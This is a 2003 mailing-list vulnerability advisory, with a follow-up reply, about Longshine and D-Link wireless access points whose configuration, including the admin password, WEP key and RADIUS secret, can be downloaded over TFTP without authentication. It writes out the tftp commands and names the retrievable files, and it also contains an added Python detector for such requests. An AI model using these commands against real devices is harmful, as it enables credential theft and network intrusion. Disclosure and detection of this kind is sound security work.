View Full Version : Longshine WLAN Access-Point LCS-883R VU#310201



Lukas Grunwald
06/01/03, 20:30
Hardware: Longshine LCS-883R-AC-B External WLAN Access Point 22 Mbps

Software: ThreadX ARM7/Green Hills Version G3.0f.3.0c from Express Logic Inc.

Description: Get superuser privileges and view the device's password and other passwords

Versions affected: tested with 03.01.0b and 03.01.0h

Vendor contacted: e-mailed Longshine on Sun Dec 29

Details: You are able to connect via tftp to the access point and you can download the configuration
without authentication.
In this configuration the username of the superuser and the corresponding password are stored.
The WEP secret for the encryption and the password from your RADIUS server are also readable.
This "attack" works via WLAN (!!!) and Ethernet.

tftp
tftp> connect 192.168.108.48
tftp> get config.img
Received 780 bytes in 1.0 seconds
tftp> quit

[~]/-\>strings config.img
DNXLABAP01 <- name of the AP
root <- name of the superuser
XXXXXX123 <- password from superuser
DNXLABLAN <- ssid
secu9 <- secret for WEP
7890abcdef <-

You are also able to get the following files:

config.img
wbtune.dat
mac.dat
rom.img
normal.img


Solution: After contact with the vendor, he claims that a new firmware upgrade
fixes this problem, but the latest available firmware on his web page
doesn't fix it anyway.

Vendor-Contact:

LONGSHINE Technologie (Europe) GmbH

An der Strusbek 9
D-22926 Ahrensburg

Tel: ++ 49 ( 0 ) 4102 / 4922- 0
Fax: ++ 49 ( 0 ) 4102 / 40109

support@longshine.de
--
Regards
Lukas Grunwald aka REG lg1

DN-Systems Enterprise Internet Solutions GmbH
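
An added example, not part of the original post or of any vendor code: detection logic for the unauthenticated retrieval described above, written in Python. It parses TFTP request payloads (RFC 1350) and flags read requests for the file names listed in the post; the tuple layout of the input, the client address 192.168.108.77 and the case-insensitive match are assumptions made for the example.

```python
import struct

# Filenames the advisory lists as retrievable over TFTP without authentication.
SENSITIVE = {"config.img", "wbtune.dat", "mac.dat", "rom.img", "normal.img"}
TFTP_PORT = 69  # initial requests always go to UDP/69 (RFC 1350)

def parse_request(payload):
    """Parse a TFTP RRQ/WRQ payload; return (op, filename, mode) or None."""
    if len(payload) < 4:
        return None
    (opcode,) = struct.unpack("!H", payload[:2])
    if opcode not in (1, 2):           # 1 = read request, 2 = write request
        return None
    fields = payload[2:].split(b"\x00")  # filename NUL mode NUL [options]
    if len(fields) < 3 or not fields[0] or not fields[1]:
        return None                    # missing terminator or empty field
    try:
        filename, mode = fields[0].decode("ascii"), fields[1].decode("ascii")
    except UnicodeDecodeError:
        return None
    return ("RRQ" if opcode == 1 else "WRQ", filename, mode.lower())

def flag_sensitive_reads(packets):
    """packets: iterable of (src_ip, dst_ip, dst_port, udp_payload) tuples."""
    alerts = []
    for src, dst, dport, payload in packets:
        if dport != TFTP_PORT:
            continue
        req = parse_request(payload)
        if req is None or req[0] != "RRQ":
            continue
        # Assumption: compare the base name case-insensitively, to be conservative.
        name = req[1].replace("\\", "/").rsplit("/", 1)[-1].lower()
        if name in SENSITIVE:
            alerts.append((src, dst, name))
    return alerts

# Constructed sample traffic; 192.168.108.48 is the AP address used in the post,
# 192.168.108.77 is a made-up client.
AP, CLIENT = "192.168.108.48", "192.168.108.77"
SAMPLE = [
    (CLIENT, AP, 69, b"\x00\x01config.img\x00octet\x00"),     # flagged
    (CLIENT, AP, 69, b"\x00\x01readme.txt\x00netascii\x00"),  # other file
    (CLIENT, AP, 69, b"\x00\x02config.img\x00octet\x00"),     # write, not read
    (CLIENT, AP, 69, b"\x00\x01ROM.IMG\x00octet\x00"),        # flagged
    (CLIENT, AP, 69, b"\x00\x01config.img\x00octet"),         # malformed
    (CLIENT, AP, 80, b"\x00\x01config.img\x00octet\x00"),     # not TFTP port
]

if __name__ == "__main__":
    for alert in flag_sensitive_reads(SAMPLE):
        print("TFTP read of sensitive file: %s -> %s (%s)" % alert)
```

Only the first packet of a transfer is addressed to UDP port 69, so matching on that port is enough to catch the request itself.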

heydowns@borg.com
07/01/03, 04:12
This vulnerability is also an issue on the popular DLink DI-614+ (which I
think is based upon the Longshine product). I was able to grab config.img
and also extract the "admin" password from it. This was confirmed with
firmware version 2.03 dated 9/10/2002.

On the DLink product, you can only perform this from the "LAN-side" of the
device in the default configuration.

DLink has version 2.10 available, dated 11/25/2002, but I have not tried
it yet.

-Jeff

On Mon, 6 Jan 2003, Lukas Grunwald wrote:

>
>
> Hardware: Longshine LCS-883R-AC-B External WLAN Access Point 22 Mbps
>
> Software: ThreadX ARM7/Green Hills Version G3.0f.3.0c from Express Logic Inc.
>
> Description: Get superuser privileges and view the device's password and other passwords
>
> Versions affected: tested with 03.01.0b and 03.01.0h
>
> Vendor contacted: e-mailed Longshine on Sun Dec 29
>
> Details: You are able to connect via tftp to the access point and you can download the configuration
> without authentication.
> In this configuration the username of the superuser and the corresponding password are stored.
> The WEP secret for the encryption and the password from your RADIUS server are also readable.
> This "attack" works via WLAN (!!!) and Ethernet.
>
> tftp
> tftp> connect 192.168.108.48
> tftp> get config.img
> Received 780 bytes in 1.0 seconds
> tftp> quit
>
> [~]/-\>strings config.img
> DNXLABAP01 <- name of the AP
> root <- name of the superuser
> XXXXXX123 <- password from superuser
> DNXLABLAN <- ssid
> secu9 <- secret for WEP
> 7890abcdef <-
>
> You are also able to get the following files:
>
> config.img
> wbtune.dat
> mac.dat
> rom.img
> normal.img
>
>
> Solution: After contact with the vendor, he claims that a new firmware upgrade
> fixes this problem, but the latest available firmware on his web page
> doesn't fix it anyway.
>
> Vendor-Contact:
>
> LONGSHINE Technologie (Europe) GmbH
>
> An der Strusbek 9
> D-22926 Ahrensburg
>
> Tel: ++ 49 ( 0 ) 4102 / 4922- 0
> Fax: ++ 49 ( 0 ) 4102 / 40109
>
> support@longshine.de
>